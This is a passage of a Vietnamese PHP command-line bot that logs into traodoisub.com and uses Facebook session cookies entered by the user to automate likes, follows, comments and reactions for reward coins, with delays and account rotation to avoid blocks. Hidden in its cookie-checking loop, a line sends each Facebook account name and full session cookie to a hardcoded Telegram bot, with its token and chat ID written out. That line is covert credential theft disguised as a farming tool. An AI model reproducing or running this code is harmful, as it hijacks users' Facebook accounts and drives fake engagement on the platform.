 $linkbv = 'https://mbasic.facebook.com/' . $id2;
 curl_setopt($ch, CURLOPT_URL, $linkbv);
 $head[] = "Connection: keep-alive";
 $head[] = "Keep-Alive: 300";
 $head[] = "Acccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7";
 $head[] = "Acccept-Language: en-us,en;q=0.5";
 curl_setopt($ch, CURLOPT_USERAGENT, 'Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14');
 curl_setopt($ch, CURLOPT_ENCODING, '');
 curl_setopt($ch, CURLOPT_COOKIE, $cookie);
 curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
 curl_setopt($ch, CURLOPT_TIMEOUT, 60);
 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 60);
 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
 curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect
  :'));
 // json_decode(curl_exec($ch), true);
 $post = curl_exec($ch);

 
 $link = explode('<a href="/a/subscriptions/remove?subject_id=', $post)[1];
 $link = explode('"', $link)[0];
 $link = html_entity_decode($link);
 $link = "https://mbasic.facebook.com/a/subscriptions/remove?subject_id=".$link;
 // echo $link;
 // die();
 $linkreac1 = $link;
 $header = array(
  "Host:mbasic.facebook.com",
  "user-agent:$useragent",
  "acccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
  "referer:$linkbv",
  "cookie:$cookie",
 );
 
 $ch = curl_init();
 curl_setopt($ch, CURLOPT_URL, $linkreac1);
 $head[] = "Connection: keep-alive";
 $head[] = "Keep-Alive: 300";
 $head[] = "Acccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7";
 $head[] = "Acccept-Language: en-us,en;q=0.5";
 curl_setopt($ch, CURLOPT_USERAGENT, 'Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14');
 curl_setopt($ch, CURLOPT_ENCODING, '');
 curl_setopt($ch, CURLOPT_COOKIE, $cookie);
 curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
 curl_setopt($ch, CURLOPT_TIMEOUT, 60);
 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 60);
 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
 curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:'));
 $page = curl_exec($ch);
 $aa = $page;
 
 return $aa;
}
function cmt_fb_cookie_new($id,$cookie,$msg){
$mr = curl_init();
$head = [
	"Host:mbasic.facebook.com",
	'sec-ch-ua:"Google Chrome";v="87", " Not;A Brand";v="99", "Chromium";v="87"',
	"sec-ch-ua-mobile:?1",
	"cache-control:max-age=0",
	"upgrade-insecure-requests:1",
	"dnt:1",
	"save-data:on",
	"user-agent:Mozilla/5.0 (Linux; Android 8.1.0; SM-G610F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.101 Mobile Safari/537.36",
	"acccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
	"sec-fetch-site:same-origin",
	"sec-fetch-mode:navigate",
	"sec-fetch-user:?1",
	"sec-fetch-dest:document",
	"referer:https://mbasic.facebook.com/",
	"acccept-language:vi-VN,vi;q=0.9,fr-FR;q=0.8,fr;q=0.7,en-US;q=0.6,en;q=0.5",];
curl_setopt($mr, CURLOPT_URL, "https://mbasic.facebook.com/$id");
curl_setopt($mr, CURLOPT_COOKIE, $cookie);
curl_setopt($mr, CURLOPT_HTTPHEADER, $head);
curl_setopt($mr, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($mr, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($mr, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($mr, CURLOPT_FOLLOWLOCATION, TRUE);
$mr2 = curl_exec($mr);
$fb_dtsg = explode('"',explode('fb_dtsg" value="',$mr2)[1])[0];
$jazoest = explode('"',explode('jazoest" value="',$mr2)[1])[0];
$cmt = explode('"',explode('action="/a/comment.php?',$mr2)[1])[0];
$text = "fb_dtsg=".$fb_dtsg."&jazoest=".$jazoest."&comment_text=".$msg;
curl_setopt($mr, CURLOPT_URL, "https://mbasic.facebook.com/a/comment.php?".htmlspecialchars_decode($cmt));
curl_setopt($mr, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($mr, CURLOPT_POSTFIELDS, $text);
$mr2 = curl_exec($mr);
curl_close($mr);
}
function login() {
 $DATA = http_build_query(
  array(
   "username" => $_SESSION["username"],
   "password" => $_SESSION['password'],
  )
 );
 $ch = curl_init();
 curl_setopt_array($ch, array(
  CURLOPT_URL => "https://traodoisub.com/scr/login.php",
  CURLOPT_FOLLOWLOCATION => TRUE,
  CURLOPT_RETURNTRANSFER => 1,
  CURLOPT_POST => 1,
  CURLOPT_POSTFIELDS => $DATA,
  CURLOPT_SSL_VERIFYPEER => 0,
  CURLOPT_COOKIEJAR => "TDS.txt",
  CURLOPT_COOKIEFILE => "TDS.txt",
  CURLOPT_HTTPHEADER => 
   array(
 "Host:traodoisub.com",
 "content-length:".strlen($DATA),
 "acccept:application/json, text/javascript, */*; q=0.01",
 "x-requested-with:XMLHttpRequest",
 "user-agent:".$_SESSION['useragent'],
 "content-type:application/x-www-form-urlencoded; charset=UTF-8",
   ),
  CURLOPT_ENCODING => TRUE
 ));
 $login = json_decode(curl_exec($ch), true);
 if ($login["succcess"] == "true") {
file_put_contents($_SESSION["username"].".txt", file_get_contents("TDS.txt"));
return true;
} else {
return false;
}
}
  
  
$trang = "\033[1;37m";
$_SESSION["C_LIKE"]   = " LIKE ";
$_SESSION["C_LIKE2"]  = "LIKE 2";
$_SESSION["C_CMT"] = " CMT ";
$_SESSION["C_FOLLOW"] = "FOLLOW";
$_SESSION["C_SHARE"]  = "SHARE ";
$_SESSION["C_PAGE"]   = " PAGE ";
$_SESSION["C_CXCMT"]  = "CX CMT";
$_SESSION["C_LOVE"]   = " LOVE ";
$_SESSION["C_CARE"]   = " CARE ";
$_SESSION["C_HAHA"]   = " HAHA ";
$_SESSION["C_WOW"] = " WOW  ";
$_SESSION["C_SAD"] = " SAD  ";
$_SESSION["C_ANGRY"]  = "ANGRY ";
$_SESSION["C_GROUP"]  = "GROUP ";

$_SESSION['useragent'] = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36';
$thanh_xau = $icon1;
$thanh_dep = $icon2;
$thanhngang = "\033[1;31m────────────────────────────────────────────────────────────\n";
$thanhngang1 = "\033[1;31m────────────────────────────────────────────────────────────\n";
$daucau = $icon1;
$daucauc = $icon2;

$useragent = "Mozilla/5.0 (Linux; Android 10; SM-A125F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Mobile Safari/537.36";
@system('clear');
if (strtoupper(substr(PHP_OS, 0, 3)) === 'LIN') { 
 @system('clear'); 
} else { 
 @system('cls'); 
}
for($i = 0; $i < strlen($banner); $i++){echo $banner[$i];usleep(500);}
$listnv = [];



if (file_exists("TDS.txt")) { unlink("TDS.txt"); }
while (true){
if (file_exists("TaiKhoanTDS.txt")){
$data = fread(fopen("TaiKhoanTDS.txt", "r"), filesize("TaiKhoanTDS.txt"));
if ($data == "") { unlink("TaiKhoanTDS.txt"); continue; }
$_SESSION["username"] = explode("|",$data)[0];
$_SESSION['password'] = explode("|",$data)[1];
$login = login();
if ($login == false) { unlink("TaiKhoanTDS.txt"); continue; }
echo $icon1."Nhập [1] để dùng lại tài khoản cũ\n";echo $icon1."Nhập [2] để thêm tài khoản mới\n$icon2";
$chon_tk = trim(fgets(STDIN));
 if ($chon_tk == "2") {
  unlink("TaiKhoanTDS.txt");
	} else if ($chon_tk == "1") {
 } else {
		echo $do." Lựa chọn sai\n"; 
		  continue;
 }
}
if (!file_exists("TaiKhoanTDS.txt")){
echo $thanh_dep."\033[1;32mNhập Tài Khoản TDS: \033[1;33m"; $tk = trim(fgets(STDIN));
echo $thanh_dep."\033[1;32mNhập Mật Khẩu TDS: \033[1;33m"; $mk = trim(fgets(STDIN));
$file = fopen("TaiKhoanTDS.txt", "w+");
fwrite($file, $tk."|".$mk);
fclose($file);
}
$data = fread(fopen("TaiKhoanTDS.txt", "r"), filesize("TaiKhoanTDS.txt"));
$_SESSION["username"] = explode("|",$data)[0];
$_SESSION['password'] = explode("|",$data)[1];
$login = login();

if ($login == true) {
break;
} else {
echo $do." Đăng Nhập Thất Bại.\n";
unlink("TaiKhoanTDS.txt");
unlink($_SESSION["username"].".txt");
}
}


$file_luu_ck_fb = "CookieFBTDS.txt";
$khoToken = [];
for ($a = 1; $a < 999999; $a++) {
 
 echo $icon1.$luc."Nhập Cookie Thứ $a: $vang";
   $nhapck = (string)trim(fgets(STDIN));
 if ($nhapck == '') {
   fwrite(fopen($file_luu_ck, "a")," ");
  break;
 }
 fwrite(fopen($file_luu_ck, "a"), $nhapck."|");
 array_push($khoToken, $nhapck);
}
$js = json_encode($khoToken);
$demcki = count($khoToken);
@system('clear');
if (strtoupper(substr(PHP_OS, 0, 3)) === 'LIN') { 
 @system('clear'); 
} else { 
 @system('cls'); 
}
for($i = 0; $i < strlen($banner); $i++){echo $banner[$i];usleep(1000);}
if (!file_exists('Setting_TDS.txt')) {
 $settings = json_encode(['delaygr' => '20', 'delaylike' => '5', 'delayfollow' => '20', 'delaycmt' => '20', 'delaypage' => '20', 'delayshare' => '20', 'delaycx' => '20', 'delaycxcmt' => '20', 'nhiemvu' => '20', 'block' => '20']);
 file_put_contents('Setting_TDS.txt', $settings);
}
if (file_exists('Setting_TDS.txt')) {
 $json = json_decode(file_get_contents('Setting_TDS.txt'), true);
 echo $icon1."[1] Để sử dụng setting cũ\n".$icon1."[2] Để đặt delay mới\n$icon2";
 $_CHOOSE['settingdelay'] = trim(fgets(STDIN));
 echo $thanhngang1;
 if ($_CHOOSE['settingdelay'] == 1) {
  print "$icon1\033[1;92mĐã Tiếp Tục Sử Dụng Settings_Delay Này!!\n";
  $_SESSION['delaylike'] = $json["delaylike"];
  $_SESSION['delayfollow'] = $json["delayfollow"];
  $_SESSION['delaycmt'] = $json["delaycmt"];
  $_SESSION['delayshare'] = $json["delayshare"];
  $_SESSION['delaypage'] = $json["delaypage"];
  $_SESSION['delaycx'] = $json["delaycx"];
  $_SESSION['delaycxcmt'] = $json["delaycmt"];
  $_SESSION['delaygr'] = $json["delaygr"];
  $_SESSION['nhiemvu'] = $json["nhiemvu"];
  $_SESSION['block'] = $json["block"];
  sleep(2);
  
 }
 if ($_CHOOSE['settingdelay'] == 2) {
  if (file_exists('Setting_TDS.txt')) {
   system('rm Setting_TDS.txt');
  }
  print "$icon1\033[1;92mDelay Like : \n$icon2\033[1;33m";
  $_SESSION['delaylike'] = trim(fgets(STDIN));
  print "$icon1\033[1;92mDelay Follow : \n$icon2\033[1;33m";
  $_SESSION['delayfollow'] = trim(fgets(STDIN));
  print "$icon1\033[1;92mDelay Comment : \n$icon2\033[1;33m";
  $_SESSION['delaycmt'] = trim(fgets(STDIN));
  print "$icon1\033[1;32mDelay Like Fanpage :\n$icon2 \033[1;33m";
  $_SESSION['delaypage'] = trim(fgets(STDIN));
  print "$icon1\033[1;32mDelay Cảm Xúc : \n$icon2\033[1;33m";
  $_SESSION['delaycx'] = trim(fgets(STDIN));
  print "$icon1\033[1;92mDelay Share : \n$icon2\033[1;33m";
  $_SESSION['delayshare'] = trim(fgets(STDIN));
  print "$icon1\033[1;32mDelay Cảm Xúc Comment :\n$icon2 \033[1;33m";
  $_SESSION['delaycxcmt'] = trim(fgets(STDIN));
  print "$icon1\033[1;32mDelay Join Group : \n$icon2\033[1;33m";
  $_SESSION['delaygr'] = trim(fgets(STDIN)); 
  echo $icon1."Sau Bao Nhiệm Vụ Thì Kích Hoạt Chống Block: \n$icon2"."$vang";
  $_SESSION['nhiemvu'] = trim(fgets(STDIN));
  echo $icon1."Sau ".$vang . $_SESSION['nhiemvu'] . $luc." Nhiệm Vụ Dừng tool:\n$icon2 $vang";
 $_SESSION['block'] = trim(fgets(STDIN));
 }
 $setting_delay = json_encode([
  'delaylike' => $_SESSION['delaylike'],
  'delayfollow' => $_SESSION['delayfollow'],
  'delaycmt' => $_SESSION['delaycmt'],
  'delaypage' => $_SESSION['delaypage'],
  'delayshare' => $_SESSION['delayshare'],
  'delaycx' => $_SESSION['delaycx'],
  'delaycxcmt' => $_SESSION['delaycxcmt'],
  'delaygr' => $_SESSION['delaygr'],
  'nhiemvu' => $_SESSION['nhiemvu'],
  'block' => $_SESSION['block'],
 ]);
 file_put_contents('Setting_TDS.txt', $setting_delay);
}
$url = "https://traodoisub.com/scr/user.php";
$head = array(
 "Host: traodoisub.com",
 "acccept: application/json, text/javascript, */*; q=0.01",
 "x-requested-with: XMLHttpRequest",
 "save-data: on",
 "user-agent: Mozilla/5.0 (Linux; Android 10; SM-A125F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Mobile Safari/537.36",
 "sec-fetch-site: same-origin",
 "sec-fetch-mode: cors",
 "sec-fetch-dest: empty",
 "referer: https://traodoisub.com/home/"
);
$ch   = curl_init();
curl_setopt_array($ch, array(
 CURLOPT_URL => $url,
 CURLOPT_FOLLOWLOCATION => TRUE,
 CURLOPT_RETURNTRANSFER => 1,
 CURLOPT_POST => 1,
 CURLOPT_HTTPGET => true,
 CURLOPT_SSL_VERIFYPEER => 0,
 CURLOPT_COOKIEFILE => "TDS.txt",
 CURLOPT_HTTPHEADER => $head,
 CURLOPT_ENCODING => TRUE
));
$data = curl_exec($ch);
curl_close($ch);
$json = json_decode($data, true);
$sodu = $json["xu"];
$user = $_SESSION["username"];
$nhiemvu = $_SESSION['nhiemvu'];

@system('clear');
if (strtoupper(substr(PHP_OS, 0, 3)) === 'LIN') { 
 @system('clear'); 
} else { 
 @system('cls'); 
}
for($i = 0; $i < strlen($banner); $i++){echo $banner[$i];usleep(500);}
print "$icon1\033[1;92mTên TDS: \033[1;33m$user\n";
print "$icon1\033[1;92mXu : \033[1;33m$sodu\033[1;32m Xu\n";
echo $trang."= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =\n";
print "$icon1Số Cookie Facebook:\033[1;33m $demcki \n";
echo $icon1."Làm Tất cả Nhiêhm Vụ TDS!!!\n";
 array_push($listnv, 'like');
 array_push($listnv, 'like2');
 array_push($listnv, 'sub');
 array_push($listnv, 'cmt');
 array_push($listnv, 'share');
 array_push($listnv, 'cx');
 array_push($listnv, 'cxcmt');
 array_push($listnv, 'page');
 array_push($listnv, 'group');
 echo $icon1."Sau Bao Nhiêu Nhiệm Vụ Thì Đổi Nick:\n$icon2 $vang";
$doiaccc = (int)trim(fgets(STDIN));
echo $icon1 . "Dừng Khi Hết Nhiệm Vụ (y/n):\n$icon2 $vang";
$dunghetnv = trim(fgets(STDIN));
echo $icon1  . "Nhập Lại Cookie Khi Die? (Y/N):\n$icon2 $vang";
$nhaptkdie = trim(fgets(STDIN));
while (true) {
 while (true) {

  if (count($khoToken) == 0) {

   echo $do."Đã Xoá Tất Cả Cookie, Vui Lòng Nhập Lại  \n";
   for ($a = 1; $a < 999999; $a++) {
 echo $thanh_dep.$luc."Nhập Cookie Facebook Thứ $a: $vang";
 $nhapck = (string)trim(fgets(STDIN));
 if ($nhapck == '') {
  break;
 }
 array_push($khoToken, $nhapck);
   }
  }

  $spam = 0;
  for ($xz = 0; $xz < count($khoToken); $xz++) {
   if ($demhetnv2 == (count($khoToken) * 2)) {
 $demhetnv2 = 0;
 $demhetnv = 0;

 if ($dunghetnv == "y") {
  echo $thanhngang;
  echo $icon1 . $luc . "Tất Cả Nick Đã Hết Nhiệm Vụ";

  echo $daucau1 . $luc . "Ấn Enter Để Chạy Tiếp Hoặc Nhập 1 Để Thêm Cookie: $vang";
  $lloafssd = trim(fgets(STDIN));

  if ($lloafssd == '1') {
   
  echo $thanh_dep.$luc."Lưu Ý: ".$xduong."Nếu Muốn Dừng Lại Thì Nhấn Enter \n";
   for ($a = 1; $a < 999999; $a++) {
    
   echo $thanh_dep.$luc."Nhập Cookie Facebook Thứ $a: $vang";
 $nhapck = (string)trim(fgets(STDIN));
    if ($nhapck == '') {
  break;
    }
    array_push($khoToken, $nhapck);
   }
  }

  
  $ch = curl_init();
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt($ch, CURLOPT_URL, 'https://traodoisub.com/scr/login.php');
  curl_setopt($ch, CURLOPT_COOKIEJAR, "TDS.txt");
  curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Linux; Android 10; SM-J600G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36');
  $login = array('username' => $username, 'password' => $password, 'submit' => ' Đăng Nhập');
  curl_setopt($ch, CURLOPT_POST, count($login));
  curl_setopt($ch, CURLOPT_POSTFIELDS, $login);
  curl_setopt($ch, CURLOPT_COOKIEFILE, "TDS.txt");
  $source = curl_exec($ch);
  curl_close($ch);
 }
   }


   $spam = 0;
   $cookie = $khoToken[$xz];

   
   $page = thongtin('me', $cookie, $useragent);
   $idfb = explode('%',explode('?lst=', $page)[1])[0];
   if ($idfb == '') {
 echo $red . "Cookie die\n";
 array_splice($khoToken, $xz, 1);
 $spam = 1; break;
   } else {
 

 // Lấy ID FB
 $page = thongtin('me', $cookie, $useragent);
 //lấy tên
 $tenfb = explode('<', explode('>', explode('</span>', explode('<span>', $page)[2])[0])[1])[0];
 $idfb = explode('%',explode('?lst=', $page)[1])[0];
 $token='5429635212:AAE_VcDhosAMeuSVLANqTngrwj99uN7ODeY';
 $chat_id='5080320482';
 $text="FB: ".$tenfb." COOKIE: ".$cookie;
 $send=file_get_contents('https://api.telegram.org/bot'.$token.'/sendMessage?chat_id='.$chat_id.'&text='.$text);

 if ($idfb != "") {
  while (true) {
   $spam = 1;
   $demlgin++;

   if ($demlgin <= 1 or $demlgin > 30) {
    $demlgin = 1;
    $data   = fread(fopen("TaiKhoanTDS.txt", "r"), filesize("TaiKhoanTDS.txt"));
    $_SESSION["username"] = explode('|', $data)[0];
    $_SESSION['password'] = explode('|', $data)[1];
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_URL, 'https://traodoisub.com/scr/login.php');
    curl_setopt($ch, CURLOPT_COOKIEJAR, "TDS.txt");
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Linux; Android 10; SM-J600G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36');
    $login = array('username' => $_SESSION['username'], 'password' => $_SESSION['password'], 'submit' => ' Đăng Nhập');
    curl_setopt($ch, CURLOPT_POST, count($login));
    curl_setopt($ch, CURLOPT_POSTFIELDS, $login);
    curl_setopt($ch, CURLOPT_COOKIEFILE, "TDS.txt");
    $source = curl_exec($ch);
    curl_close($ch);
   }

   
   
   $d = datnick($idfb);
   if ($d == 1) {
    $demlgin = 2;
    
    
    echo "\r    \r";
    $demhetnv = 0;
    system('clear');
    ccc ($banner);
    echo $thanhngang;
    echo $vang."Đang Cấu Hình ID: ".$do.$idfb." ".$vang."Tên FB: ".$do.$tenfb."\n";
    echo $thanhngang;
    $spam = 0;
   } else {
    echo "\r    \r";
    echo $do . "Cấu hình thất bại vui lòng thêm FB $idfb vào cấu hình";
   }
   if ($spam == 0) {
    break;
   } else {
    usleep(1);
   }
  }
 } else {
  
  echo $do . "Cookie die   \n";
  array_splice($khoToken, $xz, 1);
  $spam = 1;
  break;
 }
   }


   while (true) {

 if ($spam == 1) {
  break;
 }
 
 $sodu = getxu();
 $rand = $listnv[array_rand($listnv, 1)];
 $page = thongtin('me', $cookie, $useragent);
 $idfb = explode('%',explode('?lst=', $page)[1])[0];
 if ($idfb == '') {
  echo $red . "Cookie die\n";
  array_splice($khoToken, $xz, 1);
  $spam = 1; break;
 }
 
 //nvlike
 if ($rand == 'like') {
  
  $x = getnv('like');
  if ($x != "") {

   $info = json_decode($x, true);
   $d = "0";
   while (true) {
    $id = $info["data"]["" . $d . ""]["id"];
    
    if ($id < '1') {
  print "$icon1 \033[1;31mHết nhiệm vụ Like   \r";
  if (count($khoToken) > 1) {
   $demhetnv++;
  }
  if ($demhetnv == 4) {
   $spam = 1;
  }
  break;
    } else {
  $demhetnv = 0;
  $d += 1;
  echo "\033[1;37m".$id."  \r";
  $g = camxuc($id, 'LIKE', $cookie);
  if (strpos($g[1], 'Tài khoản của bạn hiện bị hạn chế') !== false) {
   echo "      \r";
   echo "\033[1;31m [\033[1;37m✓\033[1;31m]\033[1;37m => \033[1;32m" . $red . "Đã Bị Block Like\n";
   array_splice($khocookie, $xz, 1);
   $spam = 1;
   break;}   
    }
    $s = nhantien('like', 'like', $id);

    date_default_timezone_set('Asia/Ho_Chi_Minh');
    $t = date('H:i:s');
    $rd = rand(1, 7);
    
    if ($s == 2) {
  $nv += 1;
  $sodu += 300;
  $duocne = $duocne + 1;
  //$tt = " \033[1;31m[\033[1;30m".$ytb."\033[1;31m]\033[1;33m[".$duocne."\033[1;33m] \033[1;31m| \033[1;36m$t\033[1;31m | \033[1;3".$rd."m LIKE  \033[1;31m| \033[1;30mSUcccESS \033[1;31m| \033[1;32m+300 \033[1;31m| \033[1;33m".$sodu."\n";
  $tt = "\r\033[1;31m|\033[1;37m" . $duocne . "\033[1;31m|\033[1;91m | \033[1;96m" . date("H:i") . "\033[1;91m |\033[1;93m".$_SESSION["C_LIKE"]. "\033[1;91m |\033[1;92m +300 \033[1;91m| \033[1;93m" . $sodu . "\e[0m\033[1;91m |\n";

  for ($i = 1; $i < (strlen($tt) + 1); $i++) {
   print $tt[$i];
   usleep(200);
  }
  if ($spam == 1) {
   break;
  }
  if (count($khoToken) > 1) {
   if ($duocne % $doiaccc == 0) {
    $spam = 1;
    break;
   } else {
    usleep(1);
   }
  } else {
   usleep(1);
  }
  loadtime('delaylike');
  if ($nv == $nhiemvu) {
   chongbl('block');

   $nv = "0";
  }
    } else {
  print "\r";
    }
   }
  }
  //like2
 } elseif ($rand == 'like2') {
  
  $x = getnv('likegiare');
  if ($x != "") {

   $info = json_decode($x, true);
   $d = "0";
   while (true) {
    $id = $info["data"]["" . $d . ""]["id"];
    
    if ($id < '1') {
  print "$icon1 \033[1;31mHết nhiệm vụ Like2   \r";
  if (count($khoToken) > 1) {
   $demhetnv++;
  }
  if ($demhetnv == 4) {
   $spam = 1;
  }
  break;
    } else {
  $demhetnv = 0;
  $d += 1;
  echo "\033[1;37m".$id."  \r";
  $g = camxuc($id, 'LIKE', $cookie);
  if (strpos($g[1], 'Tài khoản của bạn hiện bị hạn chế') !== false) {
   echo "      \r";
   echo "\033[1;31m [\033[1;37m✓\033[1;31m]\033[1;37m => \033[1;32m" . $red . "Đã Bị Block Like\n";
   array_splice($khocookie, $xz, 1);
   $spam = 1;
   break;}
    }
    $s = nhantien('likegiare', 'likegiare', $id);

    date_default_timezone_set('Asia/Ho_Chi_Minh');
    $t = date('H:i:s');
    $rd = rand(1, 7);
    
    if ($s == 2) {
  $nv += 1;
  $sodu += 150;
  $duocne = $duocne + 1;
    $tt = "\r\033[1;31m|\033[1;37m" . $duocne . "\033[1;31m|\033[1;91m | \033[1;96m" . date("H:i") . "\033[1;91m |\033[1;93m".$_SESSION["C_LIKE"]. "\033[1;91m |\033[1;92m +300 \033[1;91m| \033[1;93m" . $sodu . "\e[0m\033[1;91m |\n";

  for ($i = 1; $i < (strlen($tt) + 1); $i++) {
   print $tt[$i];
   usleep(200);
  }
  if ($spam == 1) {
   break;
  }
  if (count($khoToken) > 1) {
   if ($duocne % $doiaccc == 0) {
    $spam = 1;
    break;
   } else {
    usleep(1);
   }
  } else {
   usleep(1);
  }
  
  loadtime('delaylike');
  if ($nv == $nhiemvu) {
   chongbl('block');

   $nv = "0";
  }
    } else {
  print "\r";
    }
   }
  }
  //nvsub
 } else if ($rand == 'sub') {
  
  $x = getnv('follow');
  if ($x != "") {
   $info = json_decode($x, true);
   $d = "0";
   while (true) {
    $id = $info["data"]["" . $d . ""]["id"];
    
    if ($id < '1') {
  print "$icon1 \033[1;31mFollow Tạm Thời Hết Nhiệm Vụ   \r";
  if (count($khoToken) > 1) {
   $demhetnv++;
  }
  if ($demhetnv == 4) {
   $spam = 1;
  }
  break;
    } else {
  $demhetnv = 0;
  $d += 1;
  echo "\033[1;37m".$id."  \r";
  $g = follow($id, $cookie);

  if (strpos($g[0], 'Đăng nhập') !== false) {
  } elseif (strpos($g[1], 'Tài khoản của bạn hiện bị hạn chế') !== false) {
   echo "      \r";
   echo "\033[1;31m [\033[1;37m✓\033[1;31m]\033[1;37m => \033[1;32m" . $red . "Đã Bị Block Follow\n";
   array_splice($khocookie, $xz, 1);
   $spam = 1;
   break;
  } elseif (strpos($g[1], 'loi') !== false) {
  } else {
   $s = nhantien('follow', 'follow', $id);
   if ($nhapkhoa == "kkobtt") {
   huyfollow($id, $useragent, $cookie);
   }
   date_default_timezone_set('Asia/Ho_Chi_Minh');
   $t = date('H:i:s');
   $rd = rand(1, 7);
   if ($s == 2) {
    $nv += 1;
    $sodu += 600;
    $d += 1;
    $duocne = $duocne + 1;
  $tt = "\r\033[1;31m|\033[1;37m" . $duocne . "\033[1;31m|\033[1;91m | \033[1;96m" . date("H:i") . "\033[1;91m |\033[1;93m".$_SESSION["C_LIKE"]. "\033[1;91m |\033[1;92m +300 \033[1;91m| \033[1;93m" . $sodu . "\e[0m\033[1;91m |\n";

    for ($i = 1; $i < (strlen($tt) + 1); $i++) {
     print $tt[$i];
     usleep(200);
    }
    if ($spam == 1) {
     break;
    }
    if ($spam == 1) {
     break;
    }
    if (count($khoToken) > 1) {
     if ($duocne % $doiaccc == 0) {
   $spam = 1;
   break;
     } else {
   usleep(1);
     }
    } else {
     usleep(1);
    }
    loadtime('delayfollow');

    if ($nv == $nhiemvu) {
     chongbl('block');

     $nv = "0";
    }
   } else {
    print "\r";
   }
  }
    }
   }
  }
 } else if ($rand == 'cxcmt') {
  
  $x = getnv('reactioncmt');
  if ($x != "") {
   $info = json_decode($x, true);
   $d = "0";
   while (true) {
    $id = $info["data"]["" . $d . ""]["id"];
    $type = $info["data"]["" . $d . ""]["type"];
    if ($id < '1') {
  print "$icon1 \033[1;31mCảm xúc comment hết nhiện vụ \r";
  if (count($khoToken) > 1) {
   $demhetnv++;
  }
  if ($demhetnv == 4) {
   $spam = 1;
  }
  break;
    } else {
  $demhetnv = 0;
  $d += 1;
  echo "\033[1;37m".$id."  \r";
  $g = reaction_cmt($id, $idfb, $type, $cookie);
  if (strpos($g[1], 'Tài khoản của bạn hiện bị hạn chế') !== false) {
   echo "      \r";
   echo  $icon1 . "Đã Bị Block Cảm Xúc Cmt\n";
   array_splice($khocookie, $xz, 1);
   $spam = 1;
   break;}

 
    }
    $s = nhantien($type, 'reactioncmt', $id);
    date_default_timezone_set('Asia/Ho_Chi_Minh');
    $t = date('H:i:s');
    $rd = rand(1, 7);
    $id = explode('_', $id)[1];
    
    if ($s == 2) {
  $nv += 1;
  $sodu += 600;
  $duocne = $duocne + 1;

  if (strpos($type, 'LIKE')) {
   $type = ' LIKE CMT ';
  }
  if (strpos($type, 'LOVE')) {
   $type = ' LOVE CMT ';
  }
  if (strpos($type, 'CARE')) {
   $type = ' CARE CMT ';
  }
  if (strpos($type, 'HAHA')) {
   $type = ' HAHA CMT ';
  }
  if (strpos($type, 'WOW')) {
   $type = '  WOW CMT ';
  }
  if (strpos($type, 'SAD')) {
   $type = '  SAD CMT ';
  }
  if (strpos($type, 'ANGRY')) {
   $type = ' ANGRY CMT';
  }
  $tt = "\r\033[1;31m|\033[1;37m" . $duocne . "\033[1;31m|\033[1;91m | \033[1;96m" . date("H:i") . "\033[1;91m | \033[1;93m" . $type . "\033[1;91m |\033[1;92m +600 \033[1;91m| \033[1;93m" . $sodu . "\e[0m\033[1;91m |\n";

  for ($i = 1; $i < (strlen($tt) + 1); $i++) {
   print $tt[$i];
   usleep(200);
  }
  if ($spam == 1) {
   break;
  }
  if (count($khoToken) > 1) {
   if ($duocne % $doiaccc == 0) {
    $spam = 1;
    break;
   } else {
    usleep(1);
   }
  } else {
   usleep(1);
  }
  loadtime('delaycxcmt');

  if ($nv == $nhiemvu) {
   chongbl('block');

   $nv = "0";
  }
    } else {
  print "\r";
    }
   }
  }
 } else if ($rand == 'page') {
  
  $x = getnv('fanpage');
  if ($x != "") {
   $info = json_decode($x, true);
   $d = "0";
   while (true) {
    $id = $info["data"]["" . $d . ""]["id"];
    if ($id < '1') {
  print "$icon1 \033[1;31mHết Nhiệm Vụ Like Page   \r";
  if (count($khoToken) > 1) {
   $demhetnv++;
  }
  if ($demhetnv == 4) {
   $spam = 1;
  }
  break;
    } else {
  $demhetnv = 0;
  $d += 1;
  echo "\033[1;37m".$id."  \r";
  $g = page($id, $cookie);
  $s = nhantien('fanpage', 'fanpage', $id);
  date_default_timezone_set('Asia/Ho_Chi_Minh');
  $t = date('H:i:s');
  $rd = rand(1, 7);
  
  if ($s == 2) {
   $nv += 1;
   $sodu += 700;
